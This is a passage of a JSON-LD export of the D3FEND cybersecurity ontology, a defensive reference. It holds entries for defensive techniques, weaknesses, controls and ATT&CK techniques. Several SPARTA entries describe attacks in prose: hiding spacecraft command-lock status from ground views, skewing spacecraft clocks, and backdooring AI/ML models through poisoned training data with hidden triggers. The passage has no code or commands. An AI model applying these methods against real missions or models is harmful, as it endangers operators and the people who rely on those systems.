        "d3f:StandaloneHoneynet"
      ],
      "d3f:d3fend-id": "D3-SHN",
      "d3f:definition": "An environment created for the purpose of attracting attackers and eliciting their behaviors that is not connected to any production enterprise systems.",
      "d3f:kb-article": "## How it works\nA standalone honeynet does not directly interact with the real enterprise environment. It may be located near or in some portion of the enterprise address space, but it does not interact with enterprise resources.\n\n## Considerations\nA standalone honeynet is a lower risk to deploy compared to connected or integrated honeynets due to its isolation from the enterprise network. However, this comes at cost in loss of fidelity and realism. Significant extra effort must be made in order to make the environment look realistic.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DynamicSelectionAndGenerationOfAVirtualCloneForDetonationOfSuspiciousContentWithinAHoneyNetwork_PaloAltoNetworksInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:IntranetNetwork"
      },
      "rdfs:label": "Standalone Honeynet",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "_:Nab82330b40fa4890acdf4bf845fd56d9"
        }
      ]
    },
    {
      "@id": "_:Nab82330b40fa4890acdf4bf845fd56d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetwork"
      }
    },
    {
      "@id": "d3f:HierarchicalDomainDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HierarchicalDomainDenylisting"
      ],
      "d3f:d3fend-id": "D3-HDDL",
      "d3f:definition": "Blocking the resolution of any subdomain of a specified domain name.",
      "d3f:kb-article": "## How it works\nThis technique is used to block DNS queries from related domains and subdomains that are unauthorized.\n\nHierarchical domain blacklisting considers the blacklisting of second level domains and additional sub-domains and specific hosts for a given query value. A denylist is maintained that contains DNS names and corresponding subdomains, including wildcards, that should be blocked for a given lookup.\n\n## Considerations\n* The denylist of domain names will have to be maintained and will need to be kept up to date\n* Other domains that resolve to the domain of interest for blocking (CNAME, etc).\n* Denylists should have identified maintenance cycles to ensure lists are not stale.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Hierarchical Domain Blacklisting",
      "rdfs:label": "Hierarchical Domain Denylisting",
      "rdfs:subClassOf": {
        "@id": "d3f:ForwardResolutionDomainDenylisting"
      }
    },
    {
      "@id": "d3f:FileEncryption",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileEncryption"
      ],
      "d3f:d3fend-id": "D3-FE",
      "d3f:definition": "Encrypting a file using a cryptographic key.",
      "d3f:encrypts": {
        "@id": "d3f:File"
      },
      "d3f:kb-article": "## How it Works\nFiles are encrypted using either a single key for both encryption and decryption or separate keys. Single key encryption is symmetric encryption and using two key distinct keys is asymmetric encryption.\n\n### Symmetric Cryptography\nSymmetric encryption uses the same cryptographic key for both the encryption and decryption a file. Managing keys at scale sometimes uses asymmetric key exchange. Protocols such as RSA or Diffie-Hellman can be used to share the symmetric cryptographic key with the others.\n\n### Asymmetric Cryptography\nAsymmetric encryption is typically accomplished using public and private key certificates based on the X.509 standard. Files are encrypted using the public key and decrypted using their private key. Asymmetric encryption is typically slower than symmetric encryption and not widely used for large file encryption, but is popular for key wrapping, key exchanges, and digital signatures.\n\n## Considerations\n- Continuous monitoring must be carried out to ensure private keys are not compromised and the certificate authority (CA) is trusted.\n- Transfer of private keys between multiple devices must be performed securely.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FileEncryption101SafeguardingYourSensitiveData"
        },
        {
          "@id": "d3f:Reference-GuideToStorageEncryptionTechnologiesForEndUserDevices"
        },
        {
          "@id": "d3f:Reference-SecurityConsiderationsForExchangingFilesOverTheInternet"
        }
      ],
      "rdfs:label": "File Encryption",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N499ebd3a148d421fa20626318636fd97"
        }
      ]
    },
    {
      "@id": "_:N499ebd3a148d421fa20626318636fd97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-UEFIPlatformInitialization-Specification",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://uefi.org/sites/default/files/resources/PI_Spec_1_7_A_final_May1.pdf"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:BootloaderAuthentication"
      },
      "d3f:kb-reference-title": "UEFI Platform Initialization (PI) Specification",
      "rdfs:label": "Reference - UEFI Platform Initialization (PI) Specification"
    },
    {
      "@id": "d3f:DE-0003.05",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.05",
      "d3f:definition": "Receivers advertise acquisition states, bit lock, frame lock, and command lock, that indicate readiness to accept telecommands. Adversaries leverage these indicators in two ways: (1) use command-lock tests to validate geometry, power, Doppler, and polarization without risking visible command execution; and (2) tamper with the values that report lock status so ground views never show that lock was achieved. Techniques include freezing or clearing lock flags and counters, raising/lowering internal thresholds so lock occurs without being reported (or vice versa), and timing brief lock intervals between telemetry samples. The result is a window where the spacecraft is receptive to commands while downlinked status suggests otherwise.",
      "d3f:modifies": {
        "@id": "d3f:OperatingMode"
      },
      "rdfs:label": "Command Receiver Lock Modes - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/05/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Ne158239764644545800a9cf06e5f114a"
        }
      ],
      "skos:prefLabel": "Command Receiver Lock Modes"
    },
    {
      "@id": "_:Ne158239764644545800a9cf06e5f114a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:EX-0012.13",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.13",
      "d3f:definition": "When missions employ AI/ML, for onboard detection/classification, compression, anomaly screening, guidance aids, or ground-side planning, training data becomes a control surface. Data poisoning inserts crafted examples or labels into the training corpus or fine-tuning set so the resulting model behaves incorrectly while appearing valid. Variants include clean-label backdoors (benign-looking samples with a hidden trigger that later induces a targeted response), label flipping and biased sampling (to skew decision boundaries), and corruption of calibration/ground-truth products that the pipeline trusts. For space systems, poisoning may occur in science archives, test vectors, simulated scenes, or housekeeping datasets used to train autonomy/anomaly models; models trained on poisoned corpora are then packaged and uplinked as routine updates. Once fielded, a simple trigger pattern in imagery, telemetry, or RF features can cause misclassification, suppression, or false positives at the time and place the adversary chooses, turning model behavior into an execution mechanism keyed by data rather than code.",
      "rdfs:label": "Poison AI/ML Training Data - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/13/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Poison AI/ML Training Data"
    },
    {
      "@id": "d3f:display-order",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x display-order y: An object x should be displayed in ordinal position y when placed or listed in a d3fend display with other objects of its kind.",
      "rdfs:label": "display-order",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-display-annotation"
      }
    },
    {
      "@id": "d3f:T1493",
      "@type": "owl:Class",
      "d3f:attack-id": "T1493",
      "d3f:definition": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1565.002",
      "rdfs:label": "Transmitted Data Manipulation",
      "rdfs:seeAlso": {
        "@id": "d3f:T1565.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingDailyNetworkTrafficCommunityOutliers_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191560A1"
      },
      "d3f:kb-abstract": "A method and system for identifying insider threats within an organization is provided. The approach constructs an internal connectivity graph to identify communities of hosts/users, and checks for abnormal behavior relative to past behaviors.",
      "d3f:kb-author": "David Lopes Pegna; Himanshu Mhatre; Oliver Brdiczka",
      "d3f:kb-mitre-analysis": "This patent describes techniques for detecting insider attacks. Network packet capture data is collected and stored for processing. Metadata is extracted for each communication session on the organization's network and includes information on source and destination host destination port, number of connection attempts, size of data exchanged, duration and time of the communication. The metadata is used to build a connectivity graph of the network and identify groups of similar hosts that exhibit similar behavior. For each group of similar behavior identified, a baseline behavior pattern profile is developed. Network activity for a host within a group that deviates over a threshold from the baseline behavior patterns is identified as suspicious and an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:NetworkTrafficCommunityDeviation"
        },
        {
          "@id": "d3f:ProtocolMetadataAnomalyDetection"
        }
      ],
      "d3f:kb-reference-title": "System for implementing threat detection using daily network traffic community outliers",
      "rdfs:label": "Reference - System for implementing threat detection using daily network traffic community outliers - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:BusNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An electronic communication system that links multiple components through one shared transmission medium, together with the interface hardware and link-layer signalling that govern access to that medium.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Bus_(computing)"
      },
      "rdfs:label": "Bus Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      },
      "skos:altLabel": [
        "Bus",
        "Data Highway"
      ]
    },
    {
      "@id": "d3f:T1043",
      "@type": "owl:Class",
      "d3f:attack-id": "T1043",
      "d3f:definition": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**",
      "rdfs:label": "Commonly Used Port",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:T1597.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1597.001",
      "d3f:definition": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)",
      "rdfs:label": "Threat Intel Vendors",
      "rdfs:subClassOf": {
        "@id": "d3f:T1597"
      }
    },
    {
      "@id": "d3f:SaveRegister",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:copies": {
        "@id": "d3f:ProcessorRegister"
      },
      "rdfs:label": "Save Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N592e53770828484bac6c08ffc788b878"
        }
      ]
    },
    {
      "@id": "_:N592e53770828484bac6c08ffc788b878",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "d3f:T1583.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.002",
      "d3f:definition": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.",
      "rdfs:label": "DNS Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:IntranetMulticastNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet IPC network traffic is multicast network traffic that does not cross a given network's boundaries.",
      "rdfs:label": "Intranet Multicast Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Multicast"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001405_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account removal actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001405"
    },
    {
      "@id": "d3f:CWE-665",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-665",
      "d3f:definition": "The product does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used.",
      "rdfs:label": "Improper Initialization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:ServiceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the operation, configuration, or lifecycle of a service application. Services are specialized applications designed to provide reusable functionality to clients, systems, or other applications, often operating in the background or across networks.",
      "rdfs:label": "Service Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N90eec1df466e4a96917abf04f0a33317"
        }
      ]
    },
    {
      "@id": "_:N90eec1df466e4a96917abf04f0a33317",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1484.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1484.002",
      "d3f:definition": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.",
      "rdfs:label": "Trust Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1484"
      }
    },
    {
      "@id": "d3f:T1592.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.001",
      "d3f:definition": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).",
      "rdfs:label": "Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:KernelModuleEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the management of kernel modules, such as the loading or unloading of device drivers, extensions, or other dynamically linked components essential for kernel functionality.",
      "rdfs:label": "Kernel Module Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/kernel_extension_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelEvent"
        },
        {
          "@id": "_:N9a15fdeafdb24a769822717f38f67c79"
        },
        {
          "@id": "_:N4368181659bb427c8e9aaee6d8abf202"
        }
      ]
    },
    {
      "@id": "_:N9a15fdeafdb24a769822717f38f67c79",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:N4368181659bb427c8e9aaee6d8abf202",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:Reference-QuickExecutionOfASeriesOfSuspiciousCommands_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-04-002/"
      },
      "d3f:kb-abstract": "Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-04-002: Quick execution of a series of suspicious commands",
      "rdfs:label": "Reference - CAR-2013-04-002: Quick execution of a series of suspicious commands - MITRE"
    },
    {
      "@id": "d3f:Reference-SecurityArchitectureForTheInternetProtocol",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc1825"
      },
      "d3f:kb-abstract": "This memo describes the security mechanisms for IP version 4 (IPv4)\n   and IP version 6 (IPv6) and the services that they provide.  Each\n   security mechanism is specified in a separate document.  This\n   document also describes key management requirements for systems\n   implementing those security mechanisms.  This document is not an\n   overall Security Architecture for the Internet and is instead focused\n   on IP-layer security.",
      "d3f:kb-author": "Randall Atkinson",
      "d3f:kb-reference-of": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:kb-reference-title": "Security Architecture for the Internet Protocol",
      "rdfs:label": "Reference - Security Architecture for the Internet Protocol"
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-002%3AComponentObjectModelHijacking_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-002/"
      },
      "d3f:kb-abstract": "Adversaries may establish persistence or escalate privileges by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. This is typically done by replacing COM object registry entries under the HKEY_CURRENT_USER\\Software\\Classes\\CLSID or HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID keys. Accordingly, this analytic looks for any changes under these keys.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserSessionInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-002: Component Object Model Hijacking",
      "rdfs:label": "Reference - CAR-2020-09-002:  Component Object Model Hijacking - MITRE"
    },
    {
      "@id": "d3f:AlethicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AL",
      "d3f:definition": "Alethic logic is a modal logic that addresses the modalities of necessity and possibility.",
      "d3f:kb-article": "## References\n1. Alethic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Alethic_logic)",
      "rdfs:label": "Alethic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:accessed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x accessed-by y: The entity or resource x is accessed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:accesses"
      },
      "rdfs:label": "accessed-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-accessed-by"
        }
      ]
    },
    {
      "@id": "d3f:M1040",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:JobFunctionAccessPatternAnalysis"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SessionDurationAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        },
        {
          "@id": "d3f:UserGeolocationLogonPatternAnalysis"
        },
        {
          "@id": "d3f:WebSessionActivityAnalysis"
        }
      ],
      "rdfs:label": "Behavior Prevention on Endpoint"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Malicious Code Protection | Updates Only by Privileged Users",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "SI-3(4)"
    },
    {
      "@id": "d3f:ATTACKMobileTechnique",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Mobile Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileThing"
      }
    },
    {
      "@id": "d3f:NetworkMediaStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital media content to users.",
      "rdfs:label": "Network Media Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:attack-kb-annotation",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x attack-kb-annotation y: The offensive technique x has the kb annotation of y.",
      "rdfs:domain": {
        "@id": "d3f:OffensiveTechnique"
      },
      "rdfs:label": "attack-kb-annotation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "_:N4c323b6223644773b5da53d09d7660ba",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:CoefficientOfVariation"
          },
          {
            "@id": "d3f:InterquartileRange"
          },
          {
            "@id": "d3f:MeanAbsoluteDeviation"
          },
          {
            "@id": "d3f:MedianAbsoluteDeviation"
          },
          {
            "@id": "d3f:Range"
          },
          {
            "@id": "d3f:StandardDeviation"
          },
          {
            "@id": "d3f:Variance"
          }
        ]
      }
    },
    {
      "@id": "d3f:TrustedLibrary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-TL",
      "d3f:definition": "A trusted library is a collection of pre-verified and secure code modules or components that are used within software applications to perform specific functions. These libraries are considered reliable and have been vetted for security vulnerabilities, ensuring they do not introduce risks into the application.",
      "d3f:hardens": {
        "@id": "d3f:Subroutine"
      },
      "d3f:kb-article": "## How it Works\nUsing a trusted library can reduce the chances of introducing errors compared to writing code from scratch.\n\n\n\n## Considerations\n\nNote: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LeverageSecurityFrameworksLibraries_OWASP"
      },
      "rdfs:label": "Trusted Library",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N1f2d311a2f3f462eb853531a26970aa9"
        }
      ]
    },
    {
      "@id": "_:N1f2d311a2f3f462eb853531a26970aa9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:PassiveLogicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PassiveLogicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-PLLM",
      "d3f:definition": "Passive logical link mapping only listens to network traffic as a means to map the the whole data link layer, where the links represent logical data flows rather than physical connections.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-TenablePassiveNetworkMonitoring"
      },
      "d3f:synonym": "Passive Logical Layer Mapping",
      "rdfs:label": "Passive Logical Link Mapping",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLinkMapping"
      }
    },
    {
      "@id": "d3f:CWE-410",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-410",
      "d3f:definition": "The product's resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources.",
      "rdfs:label": "Insufficient Resource Pool",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:UserAccountDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the permanent deletion of a user account from a system or domain.",
      "rdfs:label": "User Account Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nfbbdf6702d144973a2e93ef73f666cc0"
        }
      ]
    },
    {
      "@id": "_:Nfbbdf6702d144973a2e93ef73f666cc0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:has-operating-mode",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-operating-mode y: The entity x is currently operating in or has the potential to be in operating mode y.",
      "rdfs:label": "has-operating-mode",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-825",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-825",
      "d3f:definition": "The product dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid.",
      "d3f:synonym": "Dangling pointer",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Expired Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "d3f:CWE-672"
        },
        {
          "@id": "_:N82a3ea11b300486db823890926c5773b"
        }
      ]
    },
    {
      "@id": "_:N82a3ea11b300486db823890926c5773b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:EX-0012.12",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0012.12",
      "d3f:definition": "Spacecraft maintain multiple time bases and distribute time to schedule sequences, validate timetags, manage anti-replay counters, and align navigation/attitude processing. By writing to clock registers, altering time-distribution services, switching disciplining sources, or biasing oscillator parameters, an adversary can skew these references. Effects include reordering or prematurely firing stored command sequences, invalidating timetag checks, desynchronizing counters used by authentication or ranging, misaligning estimator windows, and corrupting timestamped payload data. Even small offsets can accumulate into observable misbehavior when autonomy and scheduling depend on tight temporal guarantees. The result is execution that happens at the wrong moment, or not at all, because the system’s notion of “now” has been shifted.",
      "d3f:modifies": {
        "@id": "d3f:SystemTime"
      },
      "rdfs:label": "System Clock - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/12/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0012"
        },
        {
          "@id": "_:N5b52298636ba467e92781c8ed071e6d7"
        }
      ],
      "skos:prefLabel": "System Clock"
    },
    {
      "@id": "_:N5b52298636ba467e92781c8ed071e6d7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTime"
      }
    },
    {
      "@id": "d3f:TA0107",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Inhibit Response Function - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Inhibit Response Function"
    },
    {
      "@id": "d3f:OutputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An output device is any piece of computer hardware equipment which converts information into human-readable form. It can be text, graphics, tactile, audio, and video. Some of the output devices are Visual Display Units (VDU) i.e. a Monitor, Printer, Graphic Output devices, Plotters, Speakers etc. A new type of Output device is been developed these days, known as Speech synthesizer, a mechanism attached to the computer which produces verbal output sounding almost like human speeches.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Output_device"
      },
      "rdfs:label": "Output Device",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Scheduling",
      "@type": "owl:Class",
      "rdfs:label": "Scheduling",
      "rdfs:subClassOf": {
        "@id": "d3f:Planning"
      }
    },
    {
      "@id": "d3f:Reference-SimultaneousLoginsOnAHost_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-02-008/"
      },
      "d3f:kb-abstract": "Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.\n\nLogon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista. Logon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft's Audit Logon Events page.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationEventThresholding"
      },
      "d3f:kb-reference-title": "CAR-2013-02-008: Simultaneous Logins on a Host",
      "rdfs:label": "Reference - CAR-2013-02-008: Simultaneous Logins on a Host - MITRE"
    },
    {
      "@id": "d3f:Reference-Hardware-assistedSystemAndMethodForDetectingAndAnalyzingSystemCallsMadeToAnOpertingSystemKernel_EndgameInc",
      "@type": [
